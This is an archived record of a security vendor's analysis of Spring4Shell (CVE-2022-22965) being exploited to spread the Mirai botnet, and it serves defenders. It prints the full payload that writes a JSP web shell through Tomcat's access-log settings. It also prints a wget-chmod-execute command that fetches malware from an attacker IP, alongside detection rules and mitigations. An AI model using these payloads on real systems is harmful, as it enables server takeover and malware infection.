{
	"id": "b7b58b3f-881b-4aff-8549-b5339c974d2b",
	"created_at": "2026-04-06T00:11:45.304957Z",
	"updated_at": "2026-04-10T03:21:54.435382Z",
	"deleted_at": null,
	"sha1_hash": "d9a188d9af68a8b23b2bf26e28ef525cd9d3356b",
	"title": "CVE-2022-22965 Analyzing the Exploitation of Spring4Shell Vulnerability in Weaponizing and Executing the Mirai Botnet Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1261240,
	"plain_text": "CVE-2022-22965 Analyzing the Exploitation of Spring4Shell\r\nVulnerability in Weaponizing and Executing the Mirai Botnet\r\nMalware\r\nBy Deep Patel, Nitesh Surana, Ashish Verma ( words)\r\nPublished: 2022-04-08 · Archived: 2026-04-05 21:17:45 UTC\r\nWe discovered active exploitation of a vulnerability in the Spring Framework designated as CVE-2022-22965 that\r\nallows malicious actors to download the Mirai botnet malware.\r\nBy: Deep Patel, Nitesh Surana, Ashish Verma Apr 08, 2022 Read time: 9 min (2405 words)\r\nSave to Folio\r\nTrend Micro Threat Research observed active exploitation of the Spring4Shell vulnerability assigned as CVE-2022-\r\n22965, which allows malicious actors to weaponize and execute the Mirai botnet malware. The exploitation allows\r\nthreat actors to download the Mirai sample to the “/tmp” folder and execute them after permission change using\r\n“chmod”.\r\nWe began seeing malicious activities at the start of April 2022. We also found the malware file server with other\r\nvariants of the sample for different CPU architectures.\r\nWe discuss our findings and analysis of the exploits and patch based on our samples, as well as real-world\r\napplication of the potential risks in this blog. In the last section, we include some recommendations on how to\r\nmitigate these risks.\r\nWhat is Spring Framework?\r\nSpring Framework is used to develop enterprise-level applications in Java. It is a platform that provides\r\ncomprehensive infrastructure to support model-view-controller- or MVC-based applications developed to reduce\r\nmanual configuration and enhance memory management. It also makes code more reusable and easier to maintain by\r\nimplementing some design patterns universally.\r\nSpring Framework is part of the Spring ecosystem, which comprises other components for cloud, data, and security,\r\namong others.\r\nHow is CVE-2022-22965 different from CVE-2022-22963?\r\nThere are two vulnerabilities that allow malicious actors to achieve remote code execution (RCE) for Spring\r\nFramework. Table 1 outlines the key differences between the two:\r\nCVE-2022-22963 CVE-2022-22965\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 1 of 15\n\nSpecific to a local resource exposure bug in Spring Cloud\r\nFunction\r\nLeads to RCE in Spring Core applications\r\nunder non-default circumstances\r\nPatch available: Yes.\r\nPatch available: Yes (see section on available\r\npatches and mitigations).\r\nCVSS Base score: 9.8 (Critical) (CVSS 3.x) but much less\r\nsevere than CVE-2022-22965\r\nCVSS Base score: 9.8 (Critical) (CVSS 3.x)\r\nMakes an impact on Spring Cloud Function versions 3.1.6,\r\n3.2.2, and older unsupported versions, where the routing\r\nfunctionality is used.\r\nMakes an impact on any Java application\r\nusing Spring Core under non-default\r\ncircumstances.\r\nTable 1. Differences between CVE-2022-22963 and CVE-2022-22965\r\nDependencies, software, and versions affected\r\nAs of this writing, most of the vulnerable setups were configured to the following dependencies:\r\nSpring Framework versions before 5.2.20, 5.3.18, and Java Development Kit (JDK) version 9 or higher\r\nApache Tomcat\r\nSpring-webmvc or spring-webflux dependency\r\nUsing Spring parameter binding that is configured to use a non-basic parameter type, such as Plain Old Java\r\nObjects (POJOs)\r\nDeployable, packaged as a web application archive (WAR)\r\nWritable file system such as web apps or ROOT\r\nHow does the vulnerability exist?\r\nIn general, this vulnerability occurs when special objects or classes are exposed under certain conditions. It is quite\r\ncommon for request parameters to be bound to a POJO that is not annotated with @RequestBody, which helps in\r\nextracting parameters from HTTP requests. The class variable contains a reference to the POJO object that the HTTP\r\nparameters are mapped to.\r\nThreat actors can directly access an object by specifying the class variable in their requests. All child properties of an\r\nobject can also be accessed by malicious actors through the class objects. As a result, they can get access to all kinds\r\nof other valuable objects on the system simply by following the chains of properties.\r\nIn Spring Core for \"class.classLoader\" and \"class.protectionDomain\", logic prevents malicious access to the child\r\nproperties of the class object. However, the logic is not foolproof and can in fact be bypassed by using the\r\n\"class.module.classLoader\" selector.\r\nFigure 1. Logic to prevent child properties; this logic is not foolproof.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 2 of 15\n\nPatch analysis\r\nThe patch for Spring Framework has already been released. We provide relevant details in the succeeding section on\r\navailable patches and mitigations.\r\nIn this section, we analyze how different the patch is.\r\nAs aforementioned, the \"class.classLoader\" and \"class.protectionDomain\" logic was not adequately secure, thus\r\nrendering the Spring Framework vulnerable. To resolve this issue, the logic of child property access has been\r\nimproved in the patched version update. Currently, it only allows \"name\" variants of class properties and no longer\r\nallows the binding of ClassLoader and ProtectionDomain Types.\r\nFigure 2. spring-framework-5.3.17\r\nFigure 3. spring-framework-5.3.18\r\nDetails of the patch can be found here.\r\nExploit analysis\r\nIn this section, we attempt to understand how malicious actors can gain access to all sorts of valuable objects on the\r\nsystem by simply following the chain of properties that we previously discussed.\r\nHaving access to the class variable and all its sub-properties provides a path for threat actors to change the behavior\r\nof the web application. Their familiarity with ways to exploit exposed class objects has resulted in many techniques\r\nfor weaponizing this vulnerability.\r\nFor example, threat actors can access an AccessLogValve object and weaponize the class variable\r\n\"class.module.classLoader.resources.context.parent.pipeline.firstpath\" in Apache Tomcat. They can do this by\r\nredirecting the access log to write a web shell into the web root through manipulation of the properties of the\r\nAccessLogValve object, such as its pattern, suffix, directory, and prefix.\r\nTo illustrate:\r\nStage 1\r\nSend Crafted Packet using “burp suite” or “curl” \r\nSample Host = (http://{victim IP}:8080/)\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 3 of 15\n\nFigure 4. Specific headers and class attributes for the creation of a JSP web shell\r\nThe payload from the first stage can be sent as a single request without using different headers as shown in Figure 4\r\nand as described in this public exploit. This exploit proof of concept is also interesting since a legitimate Tomcat\r\nfeature of formatting the incoming logs to a deployed application is exploited as described in the second stage.\r\nStage 2\r\nAfter decoding the payload being used from the first stage, we observe the following parameters and values in the\r\npayload:\r\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i\r\nif(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = %\r\n{c1}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048];\r\nwhile((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i\r\nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\r\nclass.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\r\nclass.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\r\nclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\r\nWhen a server handles this request, it creates a “tomcatwar.jsp” file on the server directory, which can be observed in\r\nthe following string from the request made in the first stage.\r\nHere, five specific attributes are modified as follows:\r\n1. Pattern: It consists of a formatting layout identifying the various fields to extract from the request and log the\r\nresponse. Here you can see how the headers ‘c2’, ‘c1’, ‘suffix’ are being fetched from the headers. The substitution\r\nhappens from the incoming headers as the format is %{name_of_header}i.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 4 of 15\n\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i\r\nif(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = %\r\n{c1}i.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream(); int a = -1; byte[] b = new byte[2048];\r\nwhile((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i\r\n2. Suffix: The suffix to add to the end of each log file name. The extension of the file that will be written is .jsp\r\nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\r\n3. Directory: The absolute or relative path of a directory where the file will be created. In this case, ‘webapps/ROOT’\r\nis selected since this is the path that is contained in a default Tomcat installation.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\r\n4. Prefix: The string that is added to the start of each log file that will be created. In this case, it’s ‘tomcatwar’.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar\r\n5. fileDateFormat: The field allows for a customized timestamp to be added in the log file name. This is kept empty\r\nsince we don’t want any other extensions in the JSP webshell and this is set to empty because we don’t desire the\r\ndefault timestamp format.\r\nclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\r\nStage 3\r\nUsing the uploaded JSP web shell, malicious actors can execute commands on the server remotely, as observed in\r\nthis domain:\r\n·       (http://{victim IP}:8080/tomcatwar[.]jsp?pwd=j\u0026cmd=whoami)\r\nFigure 5. Execution of “whoami” using uploaded JSP web shell\r\nAssociated risks if unpatched\r\nThe RCE vulnerability gives threat actors full access to the compromised devices, making it a dangerous and critical\r\nvulnerability. Malicious actors can achieve various goals through RCE attacks. In contrast to other exploits, an RCE\r\nattack typically results in the following:\r\nCreation of a path to allow initial access to a device that lets threat actors to install malware or achieve other\r\ngoals\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 5 of 15\n\nProvision of means to spread malware that extracts and exfiltrates data from a device, or enabling of\r\ncommands that install malware designed to steal information\r\nDenial of service that disrupts the operation of systems or other applications on the system\r\nDeployment and execution of cryptomining or cryptojacking malware on exposed devices by exploiting the\r\nRCE vulnerability\r\nDeployment of ransomware that encrypts files and withholds access until victims settle the ransom\r\nEarliest exploitation\r\nC1WS IPS rule 1006015, which detects “class.classLoader” in the request, was first logged on our honeypots on\r\nMarch 31, 2022.\r\nIPS rule: 1006015 – Restrict Apache Struts “class.classLoader” Request\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 6 of 15\n\nFigure 6. C1WS IPS trigger\r\nWe also observed IPS triggers from the rule released recently, as follows:\r\nIPS rule: 1011372 - Spring Framework \"Spring4Shell\" Remote Code Execution Vulnerability (CVE-2022-22965)\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 7 of 15\n\nFigure 7. C1WS IPS trigger\r\nThis IPS trigger is observed when a threat actor sends the malicious payload to exploit the vulnerability.\r\nFigure 8. C1WS Log Inspection trigger on unsuccessful exploitation\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 8 of 15\n\nThis Log Inspection trigger can be observed when there is an unsuccessful exploitation attempt. It fails to create the\r\nlog file that is the web shell (shell.jsp) due to incoherent permissions on the Tomcat ROOT directory. Such indicators\r\ncan help threat analysts when they explore possible exploitation attempts of this vulnerability.\r\nFigure 9. C1WS Log Inspection trigger on unsuccessful exploitation\r\nLike the trigger in Figure 8, this Log Inspection trigger was observed as a result of an unsuccessful exploitation of\r\nthe vulnerability. Here, the file “shell.jsp” was not created. Since the file was not available, the exception\r\n“java.io.FileNotFoundException” was logged.\r\nActive exploitation\r\nWe observed active exploitation of Spring4Shell wherein malicious actors were able to weaponize and execute the\r\nMirai botnet malware on vulnerable servers, specifically in the Singapore region.\r\nThe Mirai sample is downloaded to the “/tmp” folder and executed after permission change to make them executable\r\nusing “chmod”. The exploitation requests and commands decoded are as follows:\r\nhttp://{victim IP}:9090/tomcatwar[.]jsp?\r\npwd=j\u0026cmd=cd%20/tmp;%20wget%20http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNN\r\naaaa.x86;chmod%20777%20*;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86\r\ncd /tmp; wget http://45[.]95[.]169[.]143/The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86;chmod 777\r\n*;./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86\r\nhttp://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86\r\nWe observed the samples at the start of April 2022. We also found the malware file server with other variants for\r\ndifferent CPU architectures.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 9 of 15\n\nFigure 10. Mirai malware samples for different CPU architectures\r\nFigure 11. Content of “wget.sh” as retrieved from a malicious server\r\nThe script \"wget.sh\" downloads the binaries from the malicious server and executes all the samples. The compatible\r\nones run while the rest don’t. Post execution, the files are removed from disk.\r\nTrend Micro Vision One™\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 10 of 15\n\nFigure 12. Trend Micro Vision One™ (Observed Attack Techniques) OATs triggers\r\nHere, we see the individual triggers from different modules and products of Trend Micro from the threat hunting app,\r\nwhere we can examine the different levels of severity of each significant hit. We take this to the next level in the\r\nVision One Workbench.\r\nFigure 13. Trend Micro Vision One™ Network Security Workbench trigger\r\nThis Workbench is generated from Trend Micro Cloud One™ – Network Security. This shows how Network Security\r\ncan help detect and prevent exploit attempts to protect an enterprise’s Cloud workload on its deployed virtual private\r\ncloud (VPC). Here we can see how the endpoint with the IP address “10.10.10.176” is protected by the Intrusion\r\nPrevention Filter for Spring Core Code Execution Vulnerability.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 11 of 15\n\nFigure 14. Trend Micro Vision One Workbench trigger for Spring Cloud or core vulnerability\r\nexploitation\r\nThis Workbench shows the simplification of a complex attack pattern. Here, we see the initial IPS trigger from\r\nNetwork Security where a VPC with a vulnerable EC2 instance is protected. With this Workbench, we can see that\r\nTrend Micro Cloud One™ – Workload Security and Network Security are working in resonance.\r\nWe also have the IPS trigger from Network Security detecting the exploit attempt right from the start. We can then\r\nobserve the “Identified Suspicious Command Injection\" IPS rule from Workload Security sending the trigger out.\r\nAfterward, we see the execution of other commands, and this enables threat analysts to determine the presence of a\r\nsuccessful exploitation, as the execution was followed using “curl” or “wget” to download and execute a malicious\r\nsample after a change of permissions using “chmod”.\r\nThe impact scope helps assess the other workloads that have been observed with similar exploitation indicators such\r\nas processes, files, network activity, and commands executed among others. This integrated view shows the power of\r\nhaving everything in a single screen with detection across multiple products.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 12 of 15\n\nFigure 15. Trend Micro Vision One Workbench trigger for RCE or malware dropped by exploiting\r\ncritical server vulnerability\r\nThis Workbench allows the observation of IPS triggers from Workload Security. The observation, in turn, enables the\r\nmonitoring of Command Injection traffic, followed by the Spring Core RCE IPS rule. The different arrows show the\r\ndirections of correlation between IP addresses and endpoints.\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 13 of 15\n\nFigure 16. Trend Micro Vision One Workbench trigger for observed vulnerability exploitation and\r\noutbound connection to cryptocurrency mining pool\r\nIn this Workbench trigger, we can observe the work of different Workload Security modules. We can also see the first\r\nIPS trigger. Immediately after that, we see that there is an outbound connection to a well-known cryptocurrency\r\nmining pool. This event is detected from the Activity Monitoring module, which helps log file, network, and process\r\nactivity.\r\nVision One Workbench can help analysts weed out the noise from their environments. With the help of Trend Micro\r\nthreat experts who establish and devise these rules carefully, enterprises can thwart a wide range of cyberattacks.\r\nAvailable patches and mitigations\r\nSpring has released patches for this vulnerability with complete details here.\r\nWe urge enterprises to do the following:\r\nUpgrade Spring Framework to versions 5.3.18+ and 5.2.20+.\r\nUpgrade Spring Boot to versions 2.6.6+ and2.5.12+.\r\nIn the interim, enterprises can mitigate the risks associated with the vulnerability by doing the following:\r\nMaintaining a disallow or blocklist in web application firewall to block strings that contain values such as\r\n\"class.*\", \"Class.*\", \"*.class.*\", and \"*.Class.*\"\r\nDowngrading to a lower JDK version such as version 8 might help. However, it could impact application\r\nfeatures and open doors to other attacks mitigated in higher versions of JDK.\r\nTrend Micro protection and investigation\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 14 of 15\n\nTrend Micro has also released rules and filters for detection and protection across some of its suite of products. These\r\nprovide additional protection from and detection of malicious components associated to this threat.\r\nWorkload Security and Deep Security IPS Rules\r\nRule 1011372 - Spring Framework \"Spring4Shell\" Remote Code Execution Vulnerability (CVE-2022-22965)\r\nNetwork Security and TippingPoint Filters\r\nFilter 41108: HTTP: Spring Core Code Execution Vulnerability\r\nTrend Micro™ Deep Discovery™ Inspector Network Content Inspection Rules\r\nRule 4678: CVE-2022-22965 – SPRING RCE EXPLOIT – HTTP(REQUEST)\r\nRule 4679: POSSIBLE JAVA CLASSLOADER RCE EXPLOIT – HTTP(REQUEST)\r\nIndicators of Compromise (IOCs)\r\nA list of the IOCs can be found in this text file..\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nhttps://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html\r\nPage 15 of 15\n\nFigure 6. C1WS We also observed IPS trigger IPS triggers from the rule released recently, as follows:  \nIPS rule: 1011372 -Spring Framework \"Spring4Shell\" Remote Code Execution Vulnerability (CVe-2022-22965)\n   Page 7 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html"
	],
	"report_names": [
		"cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434305,
	"ts_updated_at": 1775791314,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.pdf",
		"text": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.txt",
		"img": "https://archive.orkl.eu/d9a188d9af68a8b23b2bf26e28ef525cd9d3356b.jpg"
	}
}